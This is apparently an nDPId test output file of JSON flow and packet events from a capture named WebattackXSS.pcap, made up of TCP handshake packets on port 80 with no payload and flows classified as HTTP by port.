-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1324,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1499347124454,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347124454,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NtZAAD4GjvqsEAABwKgKMtJqAFC8CbfSAAAAAKACchCWLwAAAgQFtAQCCAoBOYEEAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1325,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1499347124454,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347124454,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0moH9pX9vAm306AScSCivAAAAgQFtAQCCAoD41J7ATmBBAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1326,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":1499347124455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347124455,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NtdAAD4GjwGsEAABwKgKMtJqAFC8CbfTB\/aV\/oAQAOVBxAAAAQEICgE5gQQD41J7"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1339,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347125743,"flow_last_seen":1499347125743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347125743,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53880,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1339,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1499347125743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347125743,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IcxAAD4GpASsEAABwKgKMtJ4AFAiLqOKAAAAAKACchBDAwAAAgQFtAQCCAoBOYJGAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1340,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":1499347125743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347125743,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0niyGNhRIi6ji6AScSBh1wAAAgQFtAQCCAoD41O9ATmCRgEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1341,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":3,"flow_last_seen":1499347125743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347125743,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Ic1AAD4GpAusEAABwKgKMtJ4AFAiLqOLshjYUoAQAOUA3gAAAQEICgE5gkcD41O9"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347128311,"flow_last_seen":1499347128311,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347128311,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1499347128311,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347128311,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83+lAAD4G5easEAABwKgKMtKSAFBV0VshAAAAAKACchBVLQAAAgQFtAQCCAoBOYTIAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1355,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1499347128311,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347128311,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0pKrZqcYVdFbIqAScSCpagAAAgQFtAQCCAoD41Y\/ATmEyAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1356,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":3,"flow_last_seen":1499347128312,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347128312,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03+pAAD4G5e2sEAABwKgKMtKSAFBV0Vsiq2anGYAQAOVIcQAAAQEICgE5hMkD41Y\/"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1366,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347129584,"flow_last_seen":1499347129584,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129584,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1366,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1499347129584,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347129584,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rtVAAD4GFvusEAABwKgKMtKgAFDfKCjSAAAAAKACchD81wAAAgQFtAQCCAoBOYYHAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1499347129584,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347129584,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0qA\/BA1B3ygo06AScSBWEQAAAgQFtAQCCAoD41d9ATmGBwEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1368,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":3,"flow_last_seen":1499347129585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347129585,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rtZAAD4GFwKsEAABwKgKMtKgAFDfKCjTPwQNQoAQAOX1GAAAAQEICgE5hgcD41d9"} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346994731,"flow_last_seen":1499347000612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52508,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346994731,"flow_last_seen":1499347000612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346997314,"flow_last_seen":1499347002612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52534,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346997314,"flow_last_seen":1499347002612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346998578,"flow_last_seen":1499347003612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52548,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346998578,"flow_last_seen":1499347003612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52548,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347001111,"flow_last_seen":1499347006612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52574,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347001111,"flow_last_seen":1499347006612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52574,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347002399,"flow_last_seen":1499347007612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52588,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347002399,"flow_last_seen":1499347007612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52588,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347003695,"flow_last_seen":1499347009612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347003695,"flow_last_seen":1499347009612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347132137,"flow_last_seen":1499347132137,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347132137,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1499347132137,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347132137,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pedAAD4GH+msEAABwKgKMtK6AFAZEC1iAAAAAKACchC7yAAAAgQFtAQCCAoBOYiFAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1499347132137,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347132137,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0rps\/2\/vGRAtY6AScSCB2QAAAgQFtAQCCAoD41n8ATmIhQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1390,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":3,"flow_last_seen":1499347132138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347132138,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0pehAAD4GH\/CsEAABwKgKMtK6AFAZEC1jbP9v8IAQAOUg4QAAAQEICgE5iIUD41n8"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1396,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347133434,"flow_last_seen":1499347133434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347133434,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1396,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1499347133434,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347133434,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Et1AAD4GsvOsEAABwKgKMtLIAFBRGZsUAAAAAKACchAUuwAAAgQFtAQCCAoBOYnJAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1397,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1499347133434,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347133434,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0sgnZz2uURmbFaAScSBRYQAAAgQFtAQCCAoD41tAATmJyQEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1398,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":3,"flow_last_seen":1499347133435,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347133435,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Et5AAD4GsvqsEAABwKgKMtLIAFBRGZsVJ2c9r4AQAOXwaAAAAQEICgE5ickD41tA"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1411,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347134702,"flow_last_seen":1499347134702,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347134702,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1411,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1499347134702,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347134702,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wYFAAD4GBE+sEAABwKgKMtLWAFCOukqHAAAAAKACchAmXAAAAgQFtAQCCAoBOYsGAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1412,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1499347134702,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347134702,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0tYST2RqjrpKiKAScSBQIQAAAgQFtAQCCAoD41x9ATmLBgEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1413,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":3,"flow_last_seen":1499347134703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347134703,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wYJAAD4GBFasEAABwKgKMtLWAFCOukqIEk9ka4AQAOXvKAAAAQEICgE5iwYD41x9"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1426,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347137239,"flow_last_seen":1499347137239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347137239,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54000,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1499347137239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347137239,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iNFAAD4GPP+sEAABwKgKMtLwAFB7ggVRAAAAAKACchB8NgAAAgQFtAQCCAoBOY2AAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1427,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":2,"flow_last_seen":1499347137239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347137239,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0vDqtMDQe4IFUqAScSButQAAAgQFtAQCCAoD4173ATmNgAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":3,"flow_last_seen":1499347137240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347137240,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iNJAAD4GPQasEAABwKgKMtLwAFB7ggVS6rTA0YAQAOUNvAAAAQEICgE5jYED4173"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1438,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347138552,"flow_last_seen":1499347138552,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347138552,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54014,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1438,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1499347138552,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347138552,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8erdAAD4GSxmsEAABwKgKMtL+AFByz\/R+AAAAAKACchCUZAAAAgQFtAQCCAoBOY7JAAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1439,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1499347138552,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347138552,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0v61vhLmcs\/0f6AScSBofAAAAgQFtAQCCAoD42A\/ATmOyQEDAwc="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1440,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1499347138553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347138553,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0erhAAD4GSyCsEAABwKgKMtL+AFByz\/R\/tb4S54AQAOUHhAAAAQEICgE5jskD42A\/"} 